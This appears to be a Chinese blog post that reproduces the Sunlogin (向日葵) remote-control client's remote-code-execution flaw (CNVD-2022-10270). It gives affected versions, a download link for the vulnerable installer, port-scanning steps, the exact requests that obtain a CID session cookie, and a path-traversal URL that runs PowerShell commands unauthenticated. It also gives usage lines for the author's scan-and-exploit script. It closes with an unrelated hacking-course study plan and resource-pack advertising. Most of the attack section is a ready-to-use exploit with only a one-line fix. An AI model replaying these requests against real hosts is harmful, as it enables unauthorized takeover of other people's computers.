目录
引言
漏洞描述
影响版本:
原理:
环境搭建
手动复现
脚本复现
修复建议
引言
本文内容仅供学习参考,若读者利用本文内容做出违法行为,笔者不提供担保!!!
漏洞描述
向日葵是一款免费的,集远程控制电脑手机、远程桌面连接、远程开机、远程管理、支持内网穿透的一体化远程控制管理工具软件。CNVD披露了Oray旗下向日葵远控软件存在远程代码执行漏洞(CNVD-2022-10270
/
CNVD-2022-03672),影响Windows系统中的个人版和简约版,攻击者可利用该漏洞获取服务器控制权。目前已发现有漏洞利用演示视频公开,请相关用户尽快采取措施进行防护。
影响版本:
向日葵个人版:windows <=11.0.0.33
向日葵简约版:<= v1.0.1.43315
原理:
当向日葵client在windows运行时,会连接远程Oray的服务器,开放对外接口,接口统一由sunlogin
处理,且开启监听外部的连接访问端口,大概在50000左右,可通过工具测试,低版本向日葵RCE主要发生在对外开放的接口/check
处,当cmd的值为ping/nslookup开头时触发
向日葵在启动的时候会随机启动一个40000+高位端口,具体在 sub_140E0AAE8
可看到,随后载入IDA,对CID关键字进行搜索sub_140E20938、sub_140E1C954、sub_140E1A1F4,往上跟发现分别对应接口/cgi-
bin/rpc 和 /cgi-bin/login.cgi ,其中在函数 sub_140E1C954 对应接口功能 /cgi-bin/rpc
中,传入如下参数即可在未授权的情况下获取到有效session,在知道被控端的验证码和识别码的情况下传入如下参数可获取到session。在知道主机的帐密的情况下通过
/cgi-bin/login.cgi 接口传入如下参数可获取到session 并返回设备的公网、内网地址等信息,该接口同时可用作暴力破解
环境搭建
在靶机安装存在漏洞的向日葵客户端,我使用的是SunloginClient_11.0.0.33162_X64.exe,我已将其放入网盘中,需要的自行提取:链接:https://pan.baidu.com/s/1LobRAEEdfYXc4Z7ej0nd3w?pwd=1234
提取码:1234
安装好向日葵客户端后,靶场环境已准备就绪。
手动复现
1.使用端口扫描的工具(如nmap,我这里使用的是其他的工具),对安装了存在向日葵漏洞的靶机40000-60000之间的端口进行扫描,找到存活的可疑端口:
2.使用浏览器对可疑端口进行访问,若页面返回{“success”:false,“msg”:“Verification
failure”}则说明该端口存在CVE-2022-10270漏洞。
3.构造url获取验证码, http://(靶机ip):55928/cgi-bin/rpc?action=verify-
haras,获取到的验证码即为cookie信息。![](https://img-
blog.csdnimg.cn/8a49420a85c1410798da36ee75d16c64.png)
4.构造命令执行的url,http://(靶机ip):55928/check?cmd=ping…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+
whoami,再利用Burpsuite工具拦截请求加上cookie信息,CID=**********************HbRTVJwZL3然后发送,就能获取到命令执行的结果。![](https://img-
blog.csdnimg.cn/6a5b9db3f2aa494b99d21c4c363a9144.png)
脚本复现
经过手动复现之后,我编写了一个脚本,能够自动的对存在向日葵漏洞的靶机进行扫描、以及漏洞利用,已上传到github,点我下载。
使用方法:
1.端口扫描:python sunflower_poc_exp.py --poc --ip (靶机ip) --port
40000-60000,获取到存在漏洞的端口。
2.漏洞利用:python sunflower_poc_exp.py --exp --ip (靶机ip) --port --command
ipconfig,进行命令执行。![](https://img-
blog.csdnimg.cn/92d2d1e28ba4435c8cae3ad5f3b7498f.png)
修复建议
更新向日葵版本。
学习计划
那么问题又来了,作为萌新小白,我应该先学什么,再学什么?
既然你都问的这么直白了,我就告诉你,零基础应该从什么开始学起:
阶段一:初级网络安全工程师
接下来我将给大家安排一个为期1个月的网络安全初级计划,当你学完后,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web渗透、安全服务、安全分析等岗位;其中,如果你等保模块学的好,还可以从事等保工程师。
综合薪资区间6k~15k
1、网络安全理论知识(2天)
①了解行业相关背景,前景,确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。(非常重要)
2、渗透测试基础(1周)
①渗透测试的流程、分类、标准
②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察
④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等
3、操作系统基础(1周)
①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全(系统入侵排查/系统加固基础)
4、计算机网络基础(1周)
①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析(HTTP、TCP/IP、ARP等)
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御:主动/被动攻击、DDOS攻击、CVE漏洞复现
5、数据库基础操作(2天)
①数据库基础
②SQL语言基础
③数据库安全加固
6、Web渗透(1周)
①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具:Nmap、BurpSuite、SQLMap、其他(菜刀、漏扫等)
那么,到此为止,已经耗时1个月左右。你已经成功成为了一名“脚本小子”。那么你还想接着往下探索吗?
阶段二:中级or高级网络安全工程师(看自己能力)
综合薪资区间15k~30k
7、脚本编程学习(4周)
在网络安全领域。是否具备编程能力是“脚本小子”和真正网络安全工程师的本质区别。在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中,想要高效地使用自制的脚本工具来实现各种目的,更是需要拥有编程能力。
零基础入门的同学,我建议选择脚本语言Python/PHP/Go/Java中的一种,对常用库进行编程学习
搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP,IDE强烈推荐Sublime;
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,没必要看完
用Python编写漏洞的exp,然后写一个简单的网络爬虫
PHP基本语法学习并书写一个简单的博客系统
熟悉MVC架构,并试着学习一个PHP框架或者Python框架 (可选)
了解Bootstrap的布局或者CSS。
阶段三:顶级网络安全工程师
如果你对网络安全入门感兴趣,那么你点击这里👉CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享
学习资料分享
当然,只给予计划不给予学习资料的行为无异于耍流氓,这里给大家整理了一份完整版的网络安全(嘿客)全套学习资料已经上传至CSDN官方,朋友们如果需要点击下方链接也可扫描下方微信二v码获取网络工程师全套资料【保证100%免费】